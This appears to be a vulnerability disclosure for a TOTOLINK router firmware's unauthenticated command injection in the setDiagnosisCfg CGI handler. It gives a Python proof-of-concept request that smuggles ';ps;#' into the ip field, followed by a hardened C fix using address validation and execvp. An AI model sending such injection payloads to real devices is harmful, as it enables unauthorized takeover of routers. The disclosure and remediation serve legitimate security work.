Vendor: http://totolink.net/
Firmware: https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/204/ids/36.html
V9.3.5u.6139_B20201216
The following image displays the code for a command injection vulnerability in the setDiagnosisCfg handler function of cstecgi.cgi. The value of the ip parameter is spliced into the command string ping %s -w ... and executed by the doSystem function, which allows an attacker to execute any command. The vulnerability does not require authentication.
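
```python
import requests

# CGI endpoint on the router's LAN address
url = "http://192.168.0.1/cgi-bin/cstecgi.cgi"

# The ip value is inserted unescaped into the ping command line
payload = """{
"topicurl": "setDiagnosisCfg",
"num": "123",
"ip": ";ps;#"
}"""

# No session cookie or credentials are sent with the request
requests.request("POST", url, data=payload)
```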
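
A hardened form of the handler's ping call, as an added example that is not the vendor's code or part of the original report: the ip value is accepted only if it parses as a literal address, and ping is started with execvp() so no shell interprets the string. The function names and the ping options -c 4 -w 5 are assumptions made for this sketch; the page elides the real options.

```c
#include <arpa/inet.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>

/* Accept only a literal IPv4/IPv6 address. Input such as ";ps;#" fails to
 * parse and is rejected before any process is started. */
int is_valid_ping_target(const char *ip)
{
    unsigned char addr[16]; /* large enough for an IPv6 address */
    if (ip == NULL || strlen(ip) >= INET6_ADDRSTRLEN)
        return 0;
    return inet_pton(AF_INET, ip, addr) == 1 ||
           inet_pton(AF_INET6, ip, addr) == 1;
}

/* Fill argv for ping. The options "-c 4 -w 5" are assumed for this example.
 * Returns 0 on success, -1 if the address is rejected or argv is too small. */
int build_ping_argv(const char *ip, const char *argv[], size_t slots)
{
    if (slots < 7 || !is_valid_ping_target(ip))
        return -1;
    argv[0] = "ping"; argv[1] = "-c"; argv[2] = "4";
    argv[3] = "-w";   argv[4] = "5";  argv[5] = ip;
    argv[6] = NULL;
    return 0;
}

/* Run ping through execvp(): no shell parses the arguments, so the address
 * stays a single argv entry. Returns ping's exit status, or -1 on error. */
int run_ping(const char *ip)
{
    const char *argv[7];
    int status;
    pid_t pid;

    if (build_ping_argv(ip, argv, 7) != 0)
        return -1;
    if ((pid = fork()) < 0)
        return -1;
    if (pid == 0) {
        execvp(argv[0], (char *const *)argv);
        _exit(127); /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

If the diagnosis feature must also accept hostnames, the validation has to be extended with a strict hostname check; the execvp() call still keeps the value out of any shell.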
